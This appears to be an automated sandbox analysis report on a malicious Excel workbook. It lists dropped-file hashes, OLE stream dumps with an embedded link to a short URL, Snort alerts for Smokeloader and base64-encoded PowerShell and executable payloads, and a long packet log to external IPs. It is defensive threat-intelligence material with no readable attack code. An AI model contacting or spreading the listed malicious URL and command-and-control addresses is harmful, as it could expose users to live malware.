Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	339146
Entropy (8bit):	7.9994598443987135
Encrypted:	true
SSDEEP:	6144:upKljPiUGxnSO5u8cimwevw560/gXW4HUrr85GJm0n9eE9/7zBNfZQ:u2GxSOAvs4HCr8e979zLe
MD5:	E23E067B88551F314FB3EA02C5657B0E
SHA1:	4FB9A3B990E9AB415E56DEA042AEC5633CB6D444
SHA-256:	4ED8F97F1B86101728DAA99BA5307373E2BEBF00BD7A97899FE1A98FA74228C3
SHA-512:	82EC3E73665BF2A01E2124FE8305C1A86E2B2D4CF06DE8979098D243ACCD121B51B89DC3D63D71BA9D05D9C5FA60E452F2E7B139DA6FBBEF75A7B1694DADF7D3
Malicious:	false
Preview:	.p.P.%.2.f...b.=..~.mE(U2......tE...Wq.u.B....0.>.a=i.v....O.a..3v..D..........U#....c.k....V.U...{.[..HX.W.Gg...tT:...?.lj~..Q........OLE.^..N.Z..d.t...$.....>..;t.L..........\|..]6>.(..........iq....\....k...aHa....K.^..+..%;/~..nC?.=,..q-.C_..W1~...71.d.HD$..nL.G..."..tQ....u=...S..O..u..@.......=..n&..C..U.2y ...(......9..q...{...p.].y...}6O....e\...G#[ng.v.G...w..Gu/..//../a.h...M..N;.d.UR.......z......d..\a...K...v...a..<}.u.@..u..,(e/...U".....~s..J....H.B.F]n.>.....V0>...%Z.TLG..X.!....:.7..b.$.UHW..................J....{K.....v..3..Y.nX...Sc..uB.l....-S.r1.N(.V..T....>..h........ypVJN.^...R..Z.i./%..yhA.v.\|g<.Q...U. ...E.n..jQ....D.....Al..(.s..&_.A.\........:h.......A...OT.".:7.E.9V......'OCo..X..GN........Z.. .[W+...a..8B.+y..l.....%4H],)_.W...t...d.4.?m........wU..P.....1e.....d.].h.m..jg.&..e....og...,B.oQ.M.P{...Z..!8..y......X..&6P.....D...]...W..Nl.f...!$KD.[3.Y../..*....:.?V%....]...7...?.+_-..=..Ls....U.I._.

C:\Users\user\Desktop\#20240627_Edlen_A.xls (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 17:35:43 2024, Security: 1
Category:	dropped
Size (bytes):	107008
Entropy (8bit):	7.843883580365994
Encrypted:	false
SSDEEP:	3072:yK4QBKGE6F1gM9tZKl2HCKMklsJnbvdfgqtC:yK5F1XtZKeCtk+BloqY
MD5:	C3BEFBA7277EAD63C018B03AF0A29327
SHA1:	0340EC0467F0023ED8E1F66F8D7DE5778CEEA937
SHA-256:	EC795DF807E407789F79E6E54D281BFBAC4F87C35EF427129A2A221B81DD04DC
SHA-512:	38260DA86D5FF807869BF92B1B91E6EE677847A37D0C76FD00B94D1545829566764B2B14D581B84AF4BA00D21D007349F5F5C65159B209998275519257F08234
Malicious:	false
Preview:	......................>..................................."...................d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!...............%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\26330000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 17:35:43 2024, Security: 1
Category:	dropped
Size (bytes):	107008
Entropy (8bit):	7.843883580365994
Encrypted:	false
SSDEEP:	3072:yK4QBKGE6F1gM9tZKl2HCKMklsJnbvdfgqtC:yK5F1XtZKeCtk+BloqY
MD5:	C3BEFBA7277EAD63C018B03AF0A29327
SHA1:	0340EC0467F0023ED8E1F66F8D7DE5778CEEA937
SHA-256:	EC795DF807E407789F79E6E54D281BFBAC4F87C35EF427129A2A221B81DD04DC
SHA-512:	38260DA86D5FF807869BF92B1B91E6EE677847A37D0C76FD00B94D1545829566764B2B14D581B84AF4BA00D21D007349F5F5C65159B209998275519257F08234
Malicious:	false
Preview:	......................>..................................."...................d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!...............%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\26330000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun May 26 18:29:10 2024, Security: 1
Entropy (8bit):	7.818406558483891
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	#20240627_Edlen_A.xls
File size:	104'960 bytes
MD5:	74cb59a86f4df8375836fd2bc3bbfd08
SHA1:	11745387b652df3e64697fc430d207251fb70fdd
SHA256:	72701fd89271a881e14bfb170ee86d28f5c08fdb73f1be8c6904337c102bf7d7
SHA512:	c2238dc90675b7c91688e1388cbfbcdd66188fdd46a36dbe0e725afc1dbba2a5a0fbfebbea278bebca46138a718010c8ae9bedab9b4c4c5190b813e0e8b13dac
SSDEEP:	1536:wTjKXZuqDBMmz9ntWp8eeej47Wnj85IrJI7reF+/DfghBUZFkMgdQ94QgLJ0:CK4QBMK9ntqj40jEgJIfeEbfbZF6j
TLSH:	A2A312BB9106C5F0D2A95C3CC9D1B2A09610AE6412DB4C56BBCDFB4C98B42E766C335B
File Content Preview:	........................>..................................."...................d..............................................................................................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "#20240627_Edlen_A.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-05-26 17:29:10
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2603503175049817
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . 7 . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD00057C23/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD00057C23/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00057C23/Package, File Type: Microsoft Excel 2007+, Stream Size: 15635

General
Stream Path:	MBD00057C23/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	15635
Entropy:	7.5397806632886
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00057C24/\x1Ole, File Type: data, Stream Size: 338

General
Stream Path:	MBD00057C24/\x1Ole
CLSID:
File Type:	data
Stream Size:	338
Entropy:	5.7103814357851395
Base64 Encoded:	False
Data ASCII:	. . . . . " U y . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . z . 2 . . . i . n . k . / . n . X . P . J . . . k W m . . Z g y . . $ . . . . , g c p } . . u . f . . . [ V . . A v _ L \\ . P . ( Q . . u S n ) " v ? . . E . d . . 9 * : . . . . . . . . . . . . . . . . . R . . . m . Q . c . z . P . i . F . P . w . u . I . T . E . K . 1 . G . 3 . 6 . 0 . Q . C . o . Y . D . e . g . w . s . m . f . I . G . y . 3 . f . U . F . R . t . 5 . . . z . _ 0 b . ' C ~ . . o x 5 ] ] .
Data Raw:	01 00 00 02 d9 e1 06 22 df 55 87 79 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 9c 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 7a 00 32 00 2e 00 69 00 6e 00 6b 00 2f 00 6e 00 58 00 50 00 4a 00 00 00 6b fd 57 ab d9 f0 6d 89 96 f4 9f 9f 02 87 c7 98 85 5a 67 79 cb 92 e4 d9 fd 09 c3 24 13 8c f2 da 00 1b 03 cb ff 2c 67 63 cf e9

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 83519

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	83519
Entropy:	7.9899585112149865
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . . F @ * i . A F K o t Q z . _ < . @ S . ] . , = . . . . . . . ~ . . . . \\ . p . . . . z 3 \\ # x F 9 @ M . . p + . x . / . p Q o q S . 0 . N . . D w . Q . . R . ; % . . . J . . % . = . = B . . . > ^ a . . . X . . . = . . . = . w . . . Y d . . . \| . ] . . . _ [ . . . . . , . . . . 0 . . . . ! . . . ~ . . . R F = . . . i . L _ . j , 5 . @ . . . p . . . . . w " . . . . . . . . . T . . . $ . . . j y 1 . . . @ i u . K g H _ P > . . f 1 . . . Y ` [ . z 5
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 fa c1 00 05 19 46 af 40 2a ef a7 ed 69 98 c0 1c ea 41 46 ce 4b eb af 6f 83 cc c3 74 89 20 51 7a 8b d3 af 5f bf 3c 0c 40 53 0f 5d 09 2c 3d b8 b0 e1 00 02 00 b0 04 c1 00 02 00 7e 0c e2 00 00 00 5c 00 70 00 0c 93 e4 a6 b4 95 83 9a f3 08 c9 c3 7a bd ae 33 df 5c 23 9f 78 46 39 c5 40 a9 d6 4d 15 06

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/27/24-18:36:08.149095	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49176	80	192.168.2.22	77.232.129.190
05/27/24-18:35:39.953040	TCP	2049038	ET TROJAN Malicious Base64 Encoded Payload In Image	443	49174	188.114.97.3	192.168.2.22
05/27/24-18:35:37.303035	TCP	2018856	ET TROJAN Windows executable base64 encoded	443	49174	188.114.97.3	192.168.2.22
05/27/24-18:35:37.303035	TCP	2047750	ET TROJAN Base64 Encoded MZ In Image	443	49174	188.114.97.3	192.168.2.22
05/27/24-18:35:39.401568	TCP	2025012	ET TROJAN Powershell commands sent B64 3	443	49174	188.114.97.3	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 18:35:10.722431898 CEST	49161	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:10.727489948 CEST	80	49161	54.241.153.192	192.168.2.22
May 27, 2024 18:35:10.727582932 CEST	49161	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:10.727703094 CEST	49161	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:10.732584953 CEST	80	49161	54.241.153.192	192.168.2.22
May 27, 2024 18:35:11.326527119 CEST	80	49161	54.241.153.192	192.168.2.22
May 27, 2024 18:35:11.326744080 CEST	49161	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:11.331583977 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:11.337372065 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:11.337450981 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:11.337543011 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:11.343558073 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002454042 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002532959 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002616882 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002652884 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002684116 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.002690077 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002684116 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.002684116 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.002726078 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.002727032 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002742052 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.002763033 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002782106 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.002798080 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002815962 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.002831936 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002850056 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.002868891 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.002883911 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.002926111 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.007945061 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.008009911 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.008023024 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.008058071 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.008073092 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.008111000 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.008879900 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.110560894 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.110584974 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.110667944 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.110909939 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.110937119 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.111000061 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.115431070 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.115449905 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.115520000 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.115758896 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.115788937 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.115813971 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.115847111 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.120486021 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.120518923 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.120528936 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.120538950 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.120553017 CEST	80	49162	198.46.177.156	192.168.2.22
May 27, 2024 18:35:12.120556116 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.120721102 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:12.854311943 CEST	49162	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:13.023293972 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.028280020 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.028337955 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.028472900 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.033343077 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.630913973 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.630934000 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.631000042 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.631078959 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.631094933 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.631226063 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.631227016 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.631227016 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.631227016 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.631227016 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.631287098 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.631303072 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.631326914 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.631345987 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.631345987 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.631366968 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.631530046 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.631546974 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.631591082 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.631591082 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.633425951 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.633460045 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.636672020 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.636733055 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.636742115 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.636794090 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:13.636823893 CEST	80	49163	54.241.153.192	192.168.2.22
May 27, 2024 18:35:13.636873007 CEST	49163	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.086366892 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.091722965 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.091805935 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.116738081 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.121737003 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.713757992 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.713804007 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.713840008 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.713871956 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.713908911 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.713918924 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.713953018 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.713979959 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.713987112 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.714011908 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.714020967 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.714044094 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.714056015 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.714073896 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.714090109 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.714104891 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.714127064 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.714133978 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.714186907 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.719958067 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.720012903 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.720036983 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.720057011 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.720068932 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.720109940 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.720118999 CEST	80	49164	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.720177889 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.783962965 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.783981085 CEST	49164	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.875308037 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.883155107 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:14.883218050 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.886816978 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:14.891680956 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506062984 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506124973 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.506138086 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506174088 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506194115 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.506221056 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.506280899 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506315947 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506325960 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.506365061 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.506469011 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506513119 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.506520033 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506555080 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506563902 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.506601095 CEST	49165	80	192.168.2.22	54.241.153.192
May 27, 2024 18:35:15.506767035 CEST	80	49165	54.241.153.192	192.168.2.22
May 27, 2024 18:35:15.506802082 CEST	80	49165	54.241.153.192	192.168.2.22
